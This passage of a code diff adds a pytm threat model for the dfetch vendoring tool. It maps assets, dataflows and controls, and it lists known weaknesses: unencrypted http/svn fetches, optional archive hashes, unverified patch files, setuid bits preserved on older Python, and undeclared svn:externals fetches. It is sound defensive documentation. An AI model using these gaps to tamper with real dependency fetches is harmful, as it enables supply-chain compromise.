+ASSET_CONTROLS: dict[str, list[Control]] = build_asset_controls_index(
+    CONTROLS, _SUPPLY_CHAIN_ASSET_IDS
+)
+
+if __name__ == "__main__":
+    run_model(build_model, CONTROLS)

--- a/security/tm_usage.py
+++ b/security/tm_usage.py
@@ -1,0 +1,1057 @@
+# pylint: disable=too-many-lines
+"""Runtime-usage threat model for dfetch.
+
+Scope: post-install lifecycle - reading the manifest, fetching dependencies
+from VCS and archive sources, applying patches, writing vendored files, and
+generating reports (SBOM, SARIF, check output).
+
+The installed dfetch package (produced by the supply chain modelled in
+``tm_supply_chain.py``) is the entry point for this model.
+
+Note on consumer security: This model covers dfetch's threat surface as a tool.
+It does not cover threats that arise from consuming the published artifact
+(PyPI wheel, installers) after vendoring is complete. Consumer-side threats
+such as package installation from a compromised PyPI account, namespace
+confusion, or MITM on downstream consumers are addressed in supply_chain.py.
+Consumers of dfetch-vendored dependencies inherit the integrity and trust
+properties established by dfetch's controls — a compromised vendored library
+will execute in the consumer's build with the same privileges as dfetch grants.
+
+Run::
+
+    python -m security.tm_usage --dfd
+    python -m security.tm_usage --seq
+    python -m security.tm_usage --report REPORT
+"""
+
+import os
+import sys
+
+# Ensure the security package is importable when loaded by Sphinx directive
+_repo_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+if _repo_root not in sys.path:
+    sys.path.insert(0, _repo_root)
+
+from pytm import (  # noqa: E402  # pylint: disable=wrong-import-position
+    TM,
+    Actor,
+    Boundary,
+    Classification,
+    Data,
+    Dataflow,
+    Datastore,
+    ExternalEntity,
+    Process,
+)
+
+from security.tm_common import (  # noqa: E402  # pylint: disable=wrong-import-position
+    THREATS_FILE,
+    Control,
+    ControlAssessment,
+    apply_report_utils_patch,
+    build_asset_controls_index,
+    make_attacker_profiles,
+    make_dev_env_boundary,
+    make_network_boundary,
+    make_usage_assumptions,
+    run_model,
+)
+
+
+def _make_usage_boundaries() -> tuple[Boundary, Boundary]:
+    """Create and return usage model trust boundaries."""
+    b_dev = make_dev_env_boundary()
+    make_network_boundary()  # auto-registers; not directly referenced by any element
+    b_remote_vcs = Boundary("Remote VCS Infrastructure")
+    b_remote_vcs.description = (
+        "Upstream Git and SVN servers (GitHub, GitLab, Gitea, self-hosted).  "
+        "Not controlled by the dfetch project; content is untrusted until verified."
+    )
+    return b_dev, b_remote_vcs
+
+
+def _make_usage_actors_and_external_entities(
+    b_dev: Boundary,
+    b_remote_vcs: Boundary,
+) -> tuple[Actor, ExternalEntity, ExternalEntity, ExternalEntity]:
+    """Create actors and external entities; return those referenced by dataflows."""
+    developer = Actor("Developer")
+    developer.inBoundary = b_dev
+    developer.description = (
+        "Writes and reviews ``dfetch.yaml``; selects upstream sources, pins "
+        "revisions, and optionally enables ``integrity.hash`` for archive "
+        "dependencies.  Trusted at workstation invocation time.  "
+        "Responsible for choosing trustworthy upstream sources and keeping "
+        "pins current."
+    )
+    remote_git_svn = ExternalEntity("A-09: Remote VCS Server")
+    remote_git_svn.inBoundary = b_remote_vcs
+    remote_git_svn.classification = Classification.PUBLIC
+    remote_git_svn.description = (
+        "Upstream Git or SVN host: GitHub, GitLab, Gitea, self-hosted Git/SVN.  "
+        "Not controlled by the dfetch project; content is untrusted until verified.  "
+        "The SLSA source level of any upstream is unknown and unverified - dfetch does "
+        "not check whether the upstream enforces branch protection, mandatory review, or "
+        "ancestry enforcement, and no VSA is fetched alongside repository content (A-23)."
+    )
+    archive_server = ExternalEntity("A-10: Archive HTTP Server")
+    archive_server.inBoundary = b_remote_vcs
+    archive_server.classification = Classification.PUBLIC
+    archive_server.description = (
+        "HTTP/HTTPS server serving ``.tar.gz``, ``.tgz``, ``.tar.bz2``, ``.tar.xz``, "
+        "or ``.zip`` files.  CRITICAL: ``http://`` (non-TLS) URLs are accepted without "
+        "enforcement of integrity hashes - the ``integrity.hash`` field is optional."
+    )
+    upstream_source_attestation = Datastore("A-23: Upstream Source Attestation (VSA)")
+    upstream_source_attestation.inBoundary = b_remote_vcs
+    upstream_source_attestation.classification = Classification.PUBLIC
+    upstream_source_attestation.description = (
+        "SLSA Source Provenance Attestation or Verification Summary Attestation (VSA) "
+        "that an upstream VCS host can publish for a specific revision, attesting that "
+        "the source-level controls required by a given SLSA source level - branch "
+        "protection, mandatory review, and ancestry enforcement - were applied.  "
+        "CRITICAL: dfetch has no mechanism to request or verify source-level attestations "
+        "and the manifest schema has no field to declare an expected SLSA source level.  "
+        "In the absence of a VSA the consumer cannot cryptographically distinguish a "
+        "well-governed upstream from one with no controls at all."
+    )
+    upstream_source_attestation.storesSensitiveData = False
+    upstream_source_attestation.hasWriteAccess = False
+    upstream_source_attestation.isSQL = False
+    upstream_source_attestation.controls.usesCodeSigning = (
+        False  # no VSA published by upstream
+    )
+    upstream_source_attestation.controls.providesIntegrity = (
+        False  # no verification possible
+    )
+    consumer_build = ExternalEntity("A-11: Consumer Build System")
+    consumer_build.inBoundary = b_dev
+    consumer_build.classification = Classification.RESTRICTED
+    consumer_build.description = (
+        "Build system that compiles fetched source code (A-13).  "
+        "Not controlled by dfetch - it receives untrusted third-party source."
+    )
+    return developer, remote_git_svn, archive_server, consumer_build
+
+
+def _make_usage_processes(b_dev: Boundary) -> tuple[Process, Process]:
+    """Create dfetch process elements; return those referenced by dataflows."""
+    dfetch_cli = Process("A-22: dfetch Process")
+    dfetch_cli.inBoundary = b_dev
+    dfetch_cli.classification = Classification.RESTRICTED
+    dfetch_cli.description = (
+        "Python CLI entry point dispatching to: update, check, diff, add, remove, "
+        "update-patch, format-patch, freeze, import, init, report, validate, environment.  "
+        "Invokes Git and SVN as subprocesses (``shell=False``, list args).  "
+        "Extracts archives with decompression-bomb limits and path-traversal checks."
+    )
+    dfetch_cli.controls.validatesInput = True  # StrictYAML + SAFE_STR regex
+    dfetch_cli.controls.sanitizesInput = True  # check_no_path_traversal realpath-based
+    dfetch_cli.controls.usesParameterizedInput = (
+        True  # shell=False, list-based subprocesses
+    )
+    dfetch_cli.controls.checksInputBounds = True  # 500MB / 10k-member archive limits
+    dfetch_cli.controls.isHardened = (
+        True  # BatchMode=yes, --non-interactive, type checks
+    )
+    dfetch_cli.controls.providesIntegrity = True  # hmac.compare_digest SHA-256/384/512
+    dfetch_cli.controls.hashVerification = (
+        True  # sha256/sha384/sha512 allowlist enforced
+    )
+    dfetch_cli.controls.invokesSubprocess = (
+        True  # git/svn invoked as list-arg subprocesses
+    )
+    patch_apply = Process("Patch Application (patch-ng)")
+    patch_apply.inBoundary = b_dev
+    patch_apply.description = (
+        "Invokes ``patch-ng`` to apply unified-diff files from ``patch:`` references "
+        "in the manifest.  Path safety is delegated entirely to ``patch-ng``'s internal "
+        "implementation - dfetch does not independently sanitise patch-file destination "
+        "paths before handing off to the library."
+    )
+    patch_apply.controls.sanitizesInput = (
+        False  # path safety delegated to patch-ng; not independently verified
+    )
+    patch_apply.controls.validatesInput = (
+        False  # no integrity hash on patch files (gap C-020)
+    )
+    patch_apply.controls.usesParameterizedInput = True  # Python library call, no shell
+    return dfetch_cli, patch_apply
+
+
+def _make_usage_datastores_a(
+    b_dev: Boundary,
+) -> tuple[Datastore, Datastore, Datastore]:
+    """Create primary data stores; return those referenced by dataflows."""
+    manifest_store = Datastore("A-12: dfetch Manifest")
+    manifest_store.inBoundary = b_dev
+    manifest_store.description = (
+        "``dfetch.yaml`` - declares all upstream sources (URL/VCS type), version pins "
+        "(branch / tag / revision / SHA), dst paths, patch references, and optional "
+        "integrity hashes.  "
+        "Tampering redirects fetches to attacker-controlled sources.  "
+        "RISK: ``integrity.hash`` is Optional in schema - archive deps can be declared "
+        "without any content-authenticity guarantee."
+    )
+    manifest_store.storesSensitiveData = (
+        False  # config only (URLs, pins, hashes), not credentials/PII
+    )
+    manifest_store.hasWriteAccess = True
+    manifest_store.isSQL = False
+    manifest_store.classification = Classification.SENSITIVE
+    manifest_store.controls.isEncryptedAtRest = False
+    manifest_store.controls.validatesInput = True  # StrictYAML validation on read
+    manifest_store.controls.providesIntegrity = (
+        True  # integrity.hash field is the content-authenticity mechanism
+    )
+    fetched_source = Datastore("A-13: Fetched Source Code")
+    fetched_source.inBoundary = b_dev
+    fetched_source.description = (
+        "Third-party source code written to the ``dst:`` path after extraction / "
+        "checkout.  Becomes a direct build input for the consuming project.  "
+        "A compromised upstream or MITM can inject malicious code that executes in "
+        "the consumer's build system, test runner, or production binary."
+    )
+    fetched_source.storesSensitiveData = True
+    fetched_source.hasWriteAccess = True
+    fetched_source.isSQL = False
+    fetched_source.classification = Classification.SENSITIVE
+    fetched_source.controls.isEncryptedAtRest = False
+    integrity_hash_record = Datastore("A-14: Integrity Hash Record")
+    integrity_hash_record.inBoundary = b_dev
+    integrity_hash_record.description = (
+        "``integrity.hash:`` field in ``dfetch.yaml`` (sha256/sha384/sha512:<hex>).  "
+        "Primary trust anchor for archive-type dependencies when present.  "
+        "Verified via ``hmac.compare_digest`` (constant-time).  "
+        "Field is optional - absence disables content verification for archives (C-018).  "
+        "Git and SVN have no equivalent; they rely entirely on transport security (C-019)."
+    )
+    integrity_hash_record.storesSensitiveData = False
+    integrity_hash_record.hasWriteAccess = True
+    integrity_hash_record.isSQL = False
+    integrity_hash_record.classification = Classification.SENSITIVE
+    integrity_hash_record.controls.providesIntegrity = True
+    sbom_output = Datastore("A-15: SBOM Output (CycloneDX)")
+    sbom_output.inBoundary = b_dev
+    sbom_output.description = (
+        "CycloneDX JSON/XML produced by ``dfetch report -t sbom``.  "
+        "Enumerates vendored components with PURL, license, and hash.  "
+        "Falsification hides actual dependencies from downstream CVE scanners.  "
+        "NOTE: this SBOM covers vendored deps only - dfetch itself has a separate "
+        "machine-readable SBOM published on PyPI (see A-04 in tm_supply_chain.py)."
+    )
+    sbom_output.storesSensitiveData = False
+    sbom_output.hasWriteAccess = True
+    sbom_output.isSQL = False
+    sbom_output.classification = Classification.RESTRICTED
+    return manifest_store, fetched_source, sbom_output
+
+
+def _make_usage_datastores_b(b_dev: Boundary) -> tuple[Data, Datastore, Datastore]:
+    """Create credential and audit data stores; return those referenced by dataflows."""
+    Data(
+        "A-16: VCS Credentials",
+        description=(
+            "SSH private keys, HTTPS Personal Access Tokens, SVN passwords.  "
+            "Used to authenticate to private upstream repositories.  "
+            "dfetch never persists these - managed by OS keychain, SSH agent, "
+            "or CI secret store."
+        ),
+        classification=Classification.SECRET,
+        isCredentials=True,
+        isPII=False,
+        isStored=False,
+        isDestEncryptedAtRest=False,
+        isSourceEncryptedAtRest=True,
+    )
+    embedded_url_credential = Data(
+        "A-17: Embedded Credential in Remote URL",
+        description=(
+            "A VCS or archive URL that encodes a credential in the userinfo component "
+            "(e.g. ``https://user:TOKEN@github.com/org/repo.git``).  "
+            "dfetch writes ``remote_url`` verbatim to ``.dfetch_data.yaml`` after each "
+            "successful fetch.  If the URL contains a Personal Access Token or password, "
+            "that credential is persisted in plaintext and typically committed to VCS, "
+            "where it becomes readable from every clone and CI checkout indefinitely."
+        ),
+        classification=Classification.SECRET,
+        isCredentials=True,
+        isPII=False,
+        isStored=True,  # written verbatim to .dfetch_data.yaml
+        isDestEncryptedAtRest=False,  # .dfetch_data.yaml is plaintext on disk
+        isSourceEncryptedAtRest=False,
+    )
+    metadata_store = Datastore("A-18: Dependency Metadata")
+    metadata_store.inBoundary = b_dev
+    metadata_store.description = (
+        "``.dfetch_data.yaml`` files written after each successful fetch.  "
+        "Contains: remote_url, revision/branch/tag, hash, last-fetch timestamp.  "
+        "Read by ``dfetch check`` to detect outdated deps.  "
+        "Tampering can suppress update notifications - an attacker who controls the "
+        "local filesystem can silently mask a compromised vendored dep."
+    )
+    metadata_store.storesSensitiveData = False
+    metadata_store.hasWriteAccess = True
+    metadata_store.isSQL = False
+    metadata_store.classification = Classification.RESTRICTED
+    metadata_store.isCredentials = True  # may contain credential-bearing URLs verbatim
+    metadata_store.isStored = True
+    metadata_store.isDestEncryptedAtRest = False  # plaintext on disk
+    patch_store = Datastore("A-19: Patch Files")
+    patch_store.inBoundary = b_dev
+    patch_store.description = (
+        "Unified-diff ``.patch`` files referenced by ``patch:`` in ``dfetch.yaml``.  "
+        "Applied by ``patch-ng`` after fetch.  "
+        "A malicious patch can write to arbitrary destination paths - "
+        "dfetch's path-traversal guards apply to archive extraction but ``patch-ng``'s "
+        "own path safety depends on its internal implementation.  "
+        "Patch files are not integrity-verified (no hash in manifest schema)."
+    )
+    patch_store.storesSensitiveData = False
+    patch_store.hasWriteAccess = True
+    patch_store.isSQL = False
+    patch_store.classification = Classification.RESTRICTED
+    return embedded_url_credential, metadata_store, patch_store
+
+
+def _make_usage_vcs_dataflows(
+    developer: Actor,
+    dfetch_cli: Process,
+    manifest_store: Datastore,
+    remote_git_svn: ExternalEntity,
+) -> None:
+    """Create VCS-related dataflows; all auto-register with TM."""
+    df01 = Dataflow(developer, dfetch_cli, "DF-01: Invoke dfetch command")
+    df01.description = "CLI invocation: update / check / diff / report / add etc."
+    df02 = Dataflow(manifest_store, dfetch_cli, "DF-02: Read manifest")
+    df02.description = "StrictYAML parse; SAFE_STR regex rejects control characters."
+    df02.controls.validatesInput = True
+    df03_tls = Dataflow(
+        dfetch_cli, remote_git_svn, "DF-03a: Fetch VCS content - HTTPS/SSH"
+    )
+    df03_tls.description = (
+        "``git fetch`` / ``git ls-remote`` over HTTPS or SSH.  "
+        "HTTPS follows up to 10 redirects.  SSH enforces ``BatchMode=yes`` and "
+        "``GIT_TERMINAL_PROMPT=0`` (no credential prompts).  SVN over "
+        "``svn+https://`` or SSH tunnel.  Transport is encrypted and server "
+        "identity verified against the OS trust store.  "
+        "Note: transport security is not content integrity - a compromised "
+        "upstream can serve attacker-controlled commits over a valid TLS "
+        "channel (see gap C-019)."
+    )
+    df03_tls.protocol = "HTTPS / SSH"
+    df03_tls.controls.isEncrypted = True
+    df03_tls.controls.isHardened = True  # BatchMode=yes, --non-interactive
+    df03_tls.controls.providesIntegrity = (
+        True  # outbound request; integrity risk is on the response (DF-04a)
+    )
+    df03_tls.controls.isNetworkFlow = True
+    df03_plain = Dataflow(
+        dfetch_cli, remote_git_svn, "DF-03b: Fetch VCS content - svn:// / http://"
+    )
+    df03_plain.description = (
+        "``git fetch`` over ``http://`` or SVN over ``svn://`` (plain, non-TLS).  "
+        "dfetch accepts these protocols without enforcement - no TLS check in manifest "
+        "schema.  Traffic is unencrypted; MITM can substitute repository content.  "
+        "RECOMMENDATION: restrict manifest URLs to HTTPS / svn+https:// / SSH."
+    )
+    df03_plain.protocol = "http / svn"
+    df03_plain.controls.isEncrypted = False
+    df03_plain.controls.isHardened = False
+    df03_plain.controls.isNetworkFlow = True
+    df03_plain.controls.isPlaintext = True
+    df04_tls = Dataflow(
+        remote_git_svn, dfetch_cli, "DF-04a: VCS content inbound - HTTPS/SSH"
+    )
+    df04_tls.description = (
+        "Repository tree and file content over HTTPS or SSH.  Transport is encrypted.  "
+        "No end-to-end content hash for Git or SVN - authenticity relies on transport "
+        "security and upstream repository integrity.  "
+        "No SLSA Source Provenance Attestation or VSA is fetched alongside content (A-23): "
+        "dfetch has no mechanism to verify the source-level controls applied by the "
+        "upstream, nor whether the pinned SHA remains reachable after an ancestry rewrite."
+    )
+    df04_tls.protocol = "HTTPS / SSH"
+    df04_tls.controls.isEncrypted = True
+    df04_tls.controls.providesIntegrity = (
+        False  # no end-to-end hash for git/svn content
+    )
+    df04_tls.controls.hasAccessControl = (
+        True  # authenticated connection (HTTPS credentials / SSH key)
+    )
+    df04_tls.controls.isNetworkFlow = True
+    df04_plain = Dataflow(
+        remote_git_svn, dfetch_cli, "DF-04b: VCS content inbound - svn:// / http://"
+    )
+    df04_plain.description = (
+        "Repository content over unencrypted ``http://`` or ``svn://``.  "
+        "A network-positioned attacker can substitute arbitrary content without "
+        "detection - no transport encryption and no content hash."
+    )
+    df04_plain.protocol = "http / svn"
+    df04_plain.controls.isEncrypted = False
+    df04_plain.controls.providesIntegrity = False
+    df04_plain.controls.isNetworkFlow = True
+    df04_plain.controls.isPlaintext = True
+
+
+def _make_usage_archive_dataflows(
+    dfetch_cli: Process,
+    archive_server: ExternalEntity,
+) -> None:
+    """Create archive download dataflows; all auto-register with TM."""
+    df05_tls = Dataflow(
+        dfetch_cli, archive_server, "DF-05a: Archive download request - HTTPS"
+    )
+    df05_tls.description = (
+        "HTTPS GET to archive URL.  Follows up to 10 3xx redirects.  "
+        "TLS authenticates the server and encrypts the channel but does not "
+        "verify the content served is what the upstream intended to publish - "
+        "content integrity requires ``integrity.hash`` in the manifest (DF-06a)."
+    )
+    df05_tls.protocol = "HTTPS"
+    df05_tls.controls.isEncrypted = True
+    df05_tls.controls.providesIntegrity = (
+        False  # TLS provides transport security, not content integrity
+    )
+    df05_tls.controls.followsRedirects = True  # follows up to 10 3xx redirects
+    df05_tls.controls.isNetworkFlow = True
+    df05_plain = Dataflow(
+        dfetch_cli, archive_server, "DF-05b: Archive download request - HTTP"
+    )
+    df05_plain.description = (
+        "HTTP GET to archive URL.  Follows up to 10 3xx redirects.  "
+        "RISK: ``http://`` (non-TLS) URLs accepted - request and response are "
+        "unencrypted."
+    )
+    df05_plain.protocol = "HTTP"
+    df05_plain.controls.isEncrypted = False
+    df05_plain.controls.followsRedirects = True  # follows up to 10 3xx redirects
+    df05_plain.controls.isNetworkFlow = True
+    df05_plain.controls.isPlaintext = True
+    df06_tls = Dataflow(archive_server, dfetch_cli, "DF-06a: Archive bytes - HTTPS")
+    df06_tls.description = (
+        "Raw archive bytes streamed into dfetch over HTTPS.  "
+        "Hash computed in-flight when ``integrity.hash`` is specified.  "
+        "CRITICAL: when ``integrity.hash`` is absent, no content verification occurs."
+    )
+    df06_tls.protocol = "HTTPS"
+    df06_tls.controls.isEncrypted = True
+    df06_tls.controls.providesIntegrity = False  # hash is optional; may be absent
+    df06_tls.controls.isNetworkFlow = True
+    df06_plain = Dataflow(
+        archive_server, dfetch_cli, "DF-06b: Archive bytes - HTTP (plaintext risk)"
+    )
+    df06_plain.description = (
+        "Raw archive bytes streamed into dfetch over unencrypted HTTP.  "
+        "Hash computed in-flight when ``integrity.hash`` is specified.  "
+        "CRITICAL: when ``integrity.hash`` is absent, no content verification occurs.  "
+        "Plaintext transport enables MITM content substitution without detection."
+    )
+    df06_plain.protocol = "HTTP"
+    df06_plain.controls.isEncrypted = False
+    df06_plain.controls.providesIntegrity = (
+        False  # http:// allowed; no transport integrity
+    )
+    df06_plain.controls.isNetworkFlow = True
+    df06_plain.controls.isPlaintext = True
+
+
+def _make_usage_output_flows(
+    dfetch_cli: Process,
+    fetched_source: Datastore,
+    metadata_store: Datastore,
+    sbom_output: Datastore,
+    embedded_url_credential: Data,
+) -> None:
+    """Create dfetch write and read-back dataflows; all auto-register with TM."""
+    df07 = Dataflow(dfetch_cli, fetched_source, "DF-07: Write vendored files")
+    df07.description = (
+        "Post-validation copy to dst path.  Path-traversal checked via "
+        "``check_no_path_traversal()``.  Symlinks validated post-extraction."
+    )
+    df07.controls.sanitizesInput = True
+    df07.controls.isHardened = (
+        True  # path-traversal and symlink checks applied before write
+    )
+    df07.controls.providesIntegrity = False  # conditional on hash presence in DF-05/06
+    df08 = Dataflow(dfetch_cli, metadata_store, "DF-08: Write dependency metadata")
+    df08.description = (
+        "Writes ``.dfetch_data.yaml`` tracking remote_url, revision, hash.  "
+        "A-17: if the manifest URL contains a credential in the userinfo component "
+        "(e.g. ``https://user:TOKEN@host/``), it is written verbatim to this file."
+    )
+    df08.data = [embedded_url_credential]  # A-17: surfaces DFT-13 on this dataflow
+    df09 = Dataflow(dfetch_cli, sbom_output, "DF-09: Write SBOM")
+    df09.description = "CycloneDX BOM generation from metadata store contents."
+    df16 = Dataflow(metadata_store, dfetch_cli, "DF-16: Read dependency metadata")
+    df16.description = (
+        "``dfetch check`` reads ``.dfetch_data.yaml`` to compare recorded revision and "
+        "hash against upstream state.  "
+        "An attacker with local filesystem write access can tamper with this file to "
+        "suppress update notifications - recording a known-good hash for a compromised "
+        "vendored dependency."
+    )
+    df16.controls.validatesInput = (
+        False  # metadata is trusted as written; no integrity check on read
+    )
+
+
+def _make_usage_patch_and_build_flows(
+    patch_apply: Process,
+    patch_store: Datastore,
+    fetched_source: Datastore,
+    consumer_build: ExternalEntity,
+) -> None:
+    """Create patch application and build-handoff dataflows; all auto-register with TM."""
+    df10 = Dataflow(patch_store, patch_apply, "DF-10: Read patch for application")
+    df10.description = (
+        "patch-ng reads the unified-diff file referenced by ``patch:`` in the manifest.  "
+        "Patch files carry no integrity hash - a tampered patch is indistinguishable "
+        "from a legitimate one at this stage."
+    )
+    df10.controls.validatesInput = False  # no integrity hash on patch files (gap C-020)
+    df10b = Dataflow(
+        patch_apply, fetched_source, "DF-10b: Write patched files to vendor directory"
+    )
+    df10b.description = (
+        "patch-ng writes patched content to the vendor directory.  "
+        "Path-traversal safety relies on patch-ng's own implementation; dfetch does not "
+        "apply an independent ``check_no_path_traversal()`` pass on patch destinations."
+    )
+    df15 = Dataflow(fetched_source, consumer_build, "DF-15: Vendored source to build")
+    df15.description = (
+        "Fetched and patched source code consumed by the project build system.  "
+        "The build system receives third-party source whose integrity depends on "
+        "the controls applied during DF-05 through DF-10."
+    )
+
+
+def _make_usage_extraction_elements_and_flows(
+    b_dev: Boundary, dfetch_cli: Process
+) -> None:
+    """Create archive/SVN extraction elements and their dataflows; all auto-register with TM."""
+    b_archive = Boundary("Archive Content Space")
+    b_archive.description = (
+        "Downloaded archive bytes before extraction and validation.  "
+        "Decompression-bomb and path-traversal checks enforce this boundary during extraction."
+    )
+    archive_extract = Process("Archive Extraction (tarfile / zipfile)")
+    archive_extract.inBoundary = b_archive
+    archive_extract.description = (
+        "Decompresses and extracts TAR (.tar.gz/.tgz/.tar.bz2/.tar.xz) and ZIP archives "
+        "to a temporary directory.  Pre-extraction checks validate decompression-bomb "
+        "limits, path traversal, symlinks, hardlinks, device files, and FIFOs.  "
+        "On Python ≥ 3.11.4: ``filter='tar'`` strips setuid/setgid bits during extraction.  "
+        "On Python < 3.11.4: ``extractall()`` is called without a filter - setuid, setgid, "
+        "and sticky bits from TAR member headers are preserved on the extracted files, "
+        "allowing a malicious archive to introduce setuid-root binaries into the vendor "
+        "directory."
+    )
+    archive_extract.controls.checksInputBounds = True  # 500 MB / 10k member limits
+    archive_extract.controls.sanitizesInput = (
+        True  # path-traversal, symlink, hardlink checks
+    )
+    archive_extract.controls.isHardened = (
+        False  # setuid/mode stripping absent on Python < 3.11.4
+    )
+    archive_extract.controls.isArchiveExtractor = True
+    archive_extract.controls.usesParameterizedInput = (
+        True  # Python library call, no shell
+    )
+    svn_export_proc = Process("SVN Export (svn export)")
+    svn_export_proc.inBoundary = b_dev
+    svn_export_proc.description = (
+        "Runs ``svn export --non-interactive --force`` to check out SVN dependencies.  "
+        "The ``--ignore-externals`` flag is NOT passed.  SVN repositories with "
+        "``svn:externals`` properties will trigger additional fetches from third-party "
+        "SVN servers not declared in ``dfetch.yaml``.  These undeclared fetches bypass "
+        "dfetch's manifest controls: no integrity hash, no metadata record, and no code "
+        "review of the external URL."
+    )
+    svn_export_proc.controls.usesParameterizedInput = (
+        True  # shell=False, list-form args
+    )
+    svn_export_proc.controls.providesIntegrity = (
+        False  # svn:externals outside manifest scope
+    )
+    svn_export_proc.controls.isHardened = False  # no --ignore-externals flag
+    svn_export_proc.controls.invokesSubprocess = True  # svn invoked as a subprocess
+    local_vcs_cache = Datastore("A-20: Local VCS Cache (temp)")
+    local_vcs_cache.inBoundary = b_dev
+    local_vcs_cache.description = (
+        "Temporary directory used during git-clone / svn-checkout / archive extraction.  "
+        "Deleted after content is copied to dst.  "
+        "Path-traversal attacks targeting this space are mitigated by "
+        "``check_no_path_traversal()`` and post-extraction symlink walks."
+    )
+    local_vcs_cache.storesSensitiveData = False
+    local_vcs_cache.hasWriteAccess = True
+    local_vcs_cache.isSQL = False
+    local_vcs_cache.classification = Classification.RESTRICTED
+    audit_reports = Datastore("A-21: Audit / Check Reports")
+    audit_reports.inBoundary = b_dev
+    audit_reports.description = (
+        "SARIF, Jenkins warnings-ng, Code Climate JSON produced by ``dfetch check``.  "
+        "Falsification hides vulnerabilities from downstream security dashboards."
+    )
+    audit_reports.storesSensitiveData = False
+    audit_reports.hasWriteAccess = True
+    audit_reports.isSQL = False
+    audit_reports.classification = Classification.RESTRICTED
+    df11 = Dataflow(
+        dfetch_cli, archive_extract, "DF-11: Dispatch archive bytes to extraction"
+    )
+    df11.description = (
+        "dfetch passes downloaded archive bytes to extraction; "
+        "decompression-bomb and pre-extraction checks applied."
+    )
+    df11.controls.checksInputBounds = True
+    df12 = Dataflow(
+        archive_extract, local_vcs_cache, "DF-12: Write extracted archive to temp dir"
+    )
+    df12.description = (
+        "Extracted members written to temp directory; "
+        "path-traversal and symlink checks applied before each write."
+    )
+    df12.controls.sanitizesInput = True
+    df13 = Dataflow(
+        dfetch_cli, svn_export_proc, "DF-13: Dispatch SVN export subprocess"
+    )
+    df13.description = (
+        "dfetch invokes svn export as a list-arg subprocess; "
+        "svn:externals can trigger undeclared fetches outside manifest control."
+    )
+    df13.controls.usesParameterizedInput = True
+    df13.controls.isHardened = False
+    df14 = Dataflow(
+        svn_export_proc, local_vcs_cache, "DF-14: Write SVN export to temp dir"
+    )
+    df14.description = (
+        "svn export writes checked-out content to a temporary directory "
+        "before dfetch copies it to the vendor dst path."
+    )
+    df17 = Dataflow(dfetch_cli, audit_reports, "DF-17: Write audit / check reports")
+    df17.description = (
+        "dfetch check writes SARIF, Jenkins warnings-ng, or Code Climate JSON; "
+        "falsification hides vulnerabilities from downstream dashboards."
+    )
+
+
+def build_model() -> TM:
+    """Construct and return the runtime-usage threat model."""
+    TM.reset()
+    apply_report_utils_patch()
+    model = TM(
+        "dfetch Runtime Usage",
+        description=(
+            "Threat model for dfetch.  "
+            "Covers the post-install lifecycle: reading the manifest, fetching "
+            "dependencies from VCS and archive sources, applying patches, writing "
+            "vendored files, and generating reports (SBOM, SARIF, check output).  "
+            "The installed dfetch package - produced by the supply chain in "
+            "tm_supply_chain.py - is the entry point."
+        ),
+        isOrdered=True,
+        mergeResponses=True,
+        threatsFile=THREATS_FILE,
+    )
+    model.assumptions = make_usage_assumptions() + make_attacker_profiles()
+    b_dev, b_remote_vcs = _make_usage_boundaries()
+    developer, remote_git_svn, archive_server, consumer_build = (
+        _make_usage_actors_and_external_entities(b_dev, b_remote_vcs)
+    )
+    dfetch_cli, patch_apply = _make_usage_processes(b_dev)
+    manifest_store, fetched_source, sbom_output = _make_usage_datastores_a(b_dev)
+    embedded_url_credential, metadata_store, patch_store = _make_usage_datastores_b(
+        b_dev
+    )
+    _make_usage_vcs_dataflows(developer, dfetch_cli, manifest_store, remote_git_svn)
+    _make_usage_archive_dataflows(dfetch_cli, archive_server)
+    _make_usage_output_flows(
+        dfetch_cli, fetched_source, metadata_store, sbom_output, embedded_url_credential
+    )
+    _make_usage_patch_and_build_flows(
+        patch_apply, patch_store, fetched_source, consumer_build
+    )
+    _make_usage_extraction_elements_and_flows(b_dev, dfetch_cli)
+    return model
+
+
+# ── CONTROLS AND GAPS ────────────────────────────────────────────────────────
+
+CONTROLS: list[Control] = [
+    # ── Implemented controls ─────────────────────────────────────────────────
+    Control(
+        id="C-001",
+        name="Path-traversal prevention",
+        assets=["A-13", "A-20"],
+        threats=["DFT-03"],
+        reference="dfetch/util/util.py",
+        assessment=ControlAssessment(
+            risk="High", stride=["Tampering", "Elevation of Privilege"]
+        ),
+        description=(
+            "``check_no_path_traversal()`` resolves both the candidate path and the "
+            "destination root via ``os.path.realpath`` (symlink-aware), then rejects "
+            "any path whose resolved prefix does not start with the resolved root.  "
+            "Applied to every file copy and post-extraction symlink."
+        ),
+    ),
+    Control(
+        id="C-002",
+        name="Decompression-bomb protection",
+        assets=["A-20", "A-13"],
+        threats=["DFT-09"],
+        reference="dfetch/vcs/archive.py",
+        assessment=ControlAssessment(risk="Medium", stride=["Denial of Service"]),
+        description=(
+            "Archives are rejected if the uncompressed size exceeds 500 MB or the "
+            "member count exceeds 10 000."
+        ),
+    ),
+    Control(
+        id="C-003",
+        name="Archive symlink validation",
+        assets=["A-13"],
+        threats=["DFT-03"],
+        reference="dfetch/vcs/archive.py",
+        assessment=ControlAssessment(
+            risk="High", stride=["Tampering", "Elevation of Privilege"]
+        ),
+        description=(
+            "Absolute and escaping (``..``) symlink targets are rejected for both "
+            "TAR and ZIP.  A post-extraction walk validates all symlinks against "
+            "the manifest root."
+        ),
+    ),
+    Control(
+        id="C-004",
+        name="Archive member type checks",
+        assets=["A-13", "A-20"],
+        threats=["DFT-03"],
+        reference="dfetch/vcs/archive.py",
+        assessment=ControlAssessment(
+            risk="Medium", stride=["Tampering", "Elevation of Privilege"]
+        ),
+        description=(
+            "TAR and ZIP members of type device file or FIFO are rejected outright."
+        ),
+    ),
+    Control(
+        id="C-005",
+        name="Integrity hash verification",
+        assets=["A-13", "A-14"],
+        threats=["DFT-01", "DFT-02", "DFT-05", "DFT-30"],
+        reference="dfetch/vcs/integrity_hash.py",
+        assessment=ControlAssessment(risk="Critical", stride=["Tampering", "Spoofing"]),
+        description=(
+            "SHA-256, SHA-384, and SHA-512 verified via ``hmac.compare_digest`` "
+            "(constant-time comparison, resistant to timing attacks).  "
+            "Primary defence against content substitution for archive dependencies.  "
+            "Effectiveness is conditional on the hash field being present - see C-018."
+        ),
+    ),
+    Control(
+        id="C-006",
+        name="Non-interactive VCS",
+        assets=["A-16", "A-09"],
+        threats=["DFT-06"],
+        reference="dfetch/vcs/git.py, dfetch/vcs/svn.py",
+        assessment=ControlAssessment(risk="Low", stride=["Spoofing"]),
+        description=(
